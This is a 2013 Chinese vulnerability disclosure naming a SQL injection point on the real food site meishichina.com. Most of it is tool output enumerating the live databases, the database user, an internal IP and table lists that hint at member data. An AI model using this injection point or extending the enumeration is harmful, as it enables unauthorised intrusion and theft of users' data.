漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2013-07-01:	积极联系厂商并且等待厂商认领中,细节不对外公开
									2013-08-15:	厂商已经主动忽略漏洞,细节向公众公开
								
简要描述:
RT..
详细说明:
行业站第一弹---美食天下。
美食看看美食  呵。。
注入点:http://home.meishichina.com/event.php?classid=6
直接上信息:
available databases [4]:
[*] buy
[*] home
[*] information_schema
[*] user
Web Server: 	MESS
DB Server: 	MySQL >=5
Resp. Time(avg):	128 ms
Current User: 	bbsinmsc@10.10.10.236
Sql Version: 	5.5.24-log
Current DB: 	home
System User: 	bbsinmsc@10.10.10.236
Host Name: 	db1.AWmshshhihK`bjTnY
Installation dir: 	/usr/local/mysql
DB User: 	'bbsinmsc'@'10.10.10.%'
Data Bases: 	information_schema
		buy
		home
		user
database management system users [1]:
[*] 'bbsinmsc'@'10.10.10.%'
bbsinmsc@10.10.10.%
current user:    'bbsinmsc@10.10.10.%'
Database: buy
[23 tables]
+---------------+
| ask           |
| card          |
| cart          |
| category      |
| charge        |
| coupon        |
| feedback      |
| flow          |
| friendlink    |
| invite        |
| order         |
| page          |
| partner       |
| pay           |
| r_item        |
| shop_category |
| shop_goods    |
| smssubscribe  |
| subscribe     |
| system        |
| team          |
| topic         |
| user          |
+---------------+
Database: home
[261 tables]
+----------------------------------+
| `r`st123`                        |
| fp                               |
| uchome_ad                        |
| uchome_adminsession              |
| uchome_album                     |
| uchome_blacklist                 |
| uchome_block                     |
| uchome_blog                      |
| uchome_blogfield                 |
| uchome_cache                     |
| uchome_cache0                    |
| uchome_cache0c                   |
| uchome_cache4                    |
| uchome_cache5                    |
| uchome_cache8                    |
| uchome_cachea                    |
| uchome_cachec                    |
| uchome_cachecd                   |
| uchome_cached                    |
| uchome_cachee                    |
| uchome_cachee8                   |
| uchome_cachef                    |
| uchome_charm_grade               |
| uchome_class                     |
| uchome_client_application        |
| uchome_client_spread             |
| uchome_cms_article               |
| uchome_comment                   |
| uchome_config                    |
| uchome_cron                      |
| uchome_daily_disgest             |
| uchome_daily_fav                 |
| uchome_data                      |
| uchome_docomment                 |
| uchome_doing                     |
| uchome_event_app_coupons         |
| uchome_event_app_detail          |
| uchome_event_app_device          |
| uchome_event_app_exam            |
| uchome_event_app_fav             |
| uchome_event_app_hao123          |
| uchome_event_app_items           |
| uchome_event_app_log             |
| uchome_event_app_mc              |
| uchome_event_app_prize           |
| uchome_event_app_question        |
| uchome_event_app_result          |
| uchome_event_app_ret             |
| uchome_event_app_shake           |
| uchome_event_app_share           |
| uchome_every_day_recipe_viewnum  |
| uchome_exchange_gold_log         |
| uchome_feed                      |
| uchome_filter                    |
| uchome_follow_day_count          |
| uchome_follow_group              |
| uchome_follow_group_users        |
| uchome_friend                    |
| uchome_friendlog                 |
| uchome_get_gold_log              |
| uchome_gold_category             |
| uchome_gold_management           |
| uchome_haierque_result           |
| uchome_impression                |
| uchome_invite                    |
| uchome_log                       |
| uchome_mailcron                  |
| uchome_mailqueue                 |
| uchome_medal                     |
| uchome_medal_apply               |
| uchome_member                    |
| uchome_members                   |
| uchome_mtag                      |
| uchome_mtaginvite                |
| uchome_myapp                     |
| uchome_myinvite                  |
| uchome_notification              |
| uchome_oscomment                 |
| uchome_pic                       |
| uchome_plug_a_blog               |
| uchome_plug_ad_magic             |
| uchome_plug_address              |
| uchome_plug_advert_item          |
| uchome_plug_advert_log           |
| uchome_plug_aladdin_byid         |
| uchome_plug_aladdin_caipu        |
| uchome_plug_aladdin_shicai       |
| uchome_plug_aladdin_soso         |
| uchome_plug_app_baidu            |
| uchome_plug_app_douban           |
| uchome_plug_app_kaixin           |
| uchome_plug_app_msn              |
| uchome_plug_app_qq               |
| uchome_plug_app_qqweibo          |
| uchome_plug_app_renren           |
| uchome_plug_app_sina             |
| uchome_plug_app_taobao           |
| uchome_plug_app_token            |
| uchome_plug_app_user             |
| uchome_plug_baidu_key            |
| uchome_plug_baidu_recipes        |
| uchome_plug_blog_sub             |
| uchome_plug_blogs                |
| uchome_plug_click                |
| uchome_plug_client_app           |
| uchome_plug_client_hot           |
| uchome_plug_client_objects       |
| uchome_plug_client_recipes       |
| uchome_plug_collect_collection   |
| uchome_plug_collect_in           |
| uchome_plug_collect_item         |
| uchome_plug_content_ingredient   |
| uchome_plug_content_item         |
| uchome_plug_content_steps        |
| uchome_plug_corp_class           |
| uchome_plug_corp_field           |
| uchome_plug_corp_pic             |
| uchome_plug_corp_sort            |
| uchome_plug_corp_supply          |
| uchome_plug_coupon_codes         |
| uchome_plug_coupon_item          |
| uchome_plug_coupon_log           |
| uchome_plug_credit_log           |
| uchome_plug_daren_blogfield      |
| uchome_plug_daren_class          |
| uchome_plug_daren_pic            |
| uchome_plug_daren_product        |
| uchome_plug_daren_rating         |
| uchome_plug_daren_sort           |
| uchome_plug_data                 |
| uchome_plug_data_desc            |
| uchome_plug_data_history         |
| uchome_plug_event_actor          |
| uchome_plug_event_award          |
| uchome_plug_event_invote         |
| uchome_plug_event_item           |
| uchome_plug_event_registration   |
| uchome_plug_event_vote           |
| uchome_plug_event_votelog        |
| uchome_plug_fav                  |
| uchome_plug_feedback             |
| uchome_plug_food_class           |
| uchome_plug_food_item            |
| uchome_plug_food_itemfeild       |
| uchome_plug_food_photo           |
| uchome_plug_game_flashgame       |
| uchome_plug_gift_item            |
| uchome_plug_gift_shop            |
| uchome_plug_giftshop_item        |
| uchome_plug_giftshop_log         |
| uchome_plug_group                |
| uchome_plug_group_follower       |
| uchome_plug_ingredient           |
| uchome_plug_ingredient_brand     |
| uchome_plug_ingredient_brand_rel |
| uchome_plug_ingredient_category  |
| uchome_plug_ingredient_nutrition |
| uchome_plug_ingredient_recipes   |
| uchome_plug_like                 |
| uchome_plug_location             |
| uchome_plug_location_member      |
| uchome_plug_mail                 |
| uchome_plug_osfav                |
| uchome_plug_pai_in               |
| uchome_plug_pai_like             |
| uchome_plug_pai_location         |
| uchome_plug_pai_photo            |
| uchome_plug_pai_recommend        |
| uchome_plug_pai_tag              |
| uchome_plug_pai_tagfield         |
| uchome_plug_pai_tips             |
| uchome_plug_play_flashgame       |
| uchome_plug_post_comment         |
| uchome_plug_post_field           |
| uchome_plug_post_item            |
| uchome_plug_post_photo           |
| uchome_plug_project              |
| uchome_plug_recipe_blog          |
| uchome_plug_recipe_down          |
| uchome_plug_recipe_ingredient    |
| uchome_plug_recipe_item          |
| uchome_plug_recipe_photo         |
| uchome_plug_recipe_rating        |
| uchome_plug_recipe_set           |
| uchome_plug_recipe_share         |
| uchome_plug_recipe_steps         |
| uchome_plug_recipe_tag           |
| uchome_plug_recipe_trigger       |
| uchome_plug_recommend            |
| uchome_plug_report               |
| uchome_plug_res_index            |
| uchome_plug_search_log           |
| uchome_plug_shop_city            |
| uchome_plug_shop_item            |
| uchome_plug_shop_type            |
| uchome_plug_show_photo           |
| uchome_plug_show_photoset        |
| uchome_plug_show_top             |
| uchome_plug_smartcogs_log        |
| uchome_plug_spaceinfo            |
| uchome_plug_sync_app             |
| uchome_plug_sync_log             |
| uchome_plug_tag                  |
| uchome_plug_tag_user             |
| uchome_plug_tags                 |
| uchome_plug_tips                 |
| uchome_plug_tool_article         |
| uchome_plug_tool_fav_item        |
| uchome_plug_tool_fav_url         |
| uchome_plug_tool_signin_item     |
| uchome_plug_topic                |
| uchome_plug_topic_area           |
| uchome_plug_topic_in             |
| uchome_plug_topic_item           |
| uchome_plug_topic_oldmove        |
| uchome_plug_tuan_actor           |
| uchome_plug_tuan_item            |
| uchome_plug_user_addr            |
| uchome_plug_vote_answer          |
| uchome_plug_vote_item            |
| uchome_plug_vote_record          |
| uchome_plug_wall                 |
| uchome_plug_wap_click            |
| uchome_plug_wap_collect          |
| uchome_plug_work_admin_log       |
| uchome_plug_work_promotion       |
| uchome_poke                      |
| uchome_post                      |
| uchome_profield                  |
| uchome_profilefield              |
| uchome_recipemain_tag            |
| uchome_reply                     |
| uchome_report                    |
| uchome_search_log                |
| uchome_session                   |
| uchome_share                     |
| uchome_shield_space              |
| uchome_show                      |
| uchome_space                     |
| uchome_space_impression          |
| uchome_spacefield                |
| uchome_spacelog                  |
| uchome_system_notification       |
| uchome_tag                       |
| uchome_tagblog                   |
| uchome_tagspace                  |
| uchome_task                      |
| uchome_thread                    |
| uchome_topic_indexpic            |
| uchome_trace                     |
| uchome_unread_notification       |
| uchome_use_log                   |
| uchome_user_follows              |
| uchome_user_medal                |
| uchome_userapp                   |
| uchome_usergroup                 |
| uchome_userlog                   |
| uchome_usertask                  |
| uchome_v_attest                  |
| uchome_visitor                   |
| uchome_wap_data_cache            |
+----------------------------------+
。。。。。。。。。。。。。。。。。。。。。。。。。。。。
会员信息有多少呢?  呵。。
 
漏洞证明:
修复方案:
你们懂。 礼物 有木有? 再怎么说我也不容易啊。
版权声明:转载请注明来源 爱上平顶山@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝

 
                 
                        



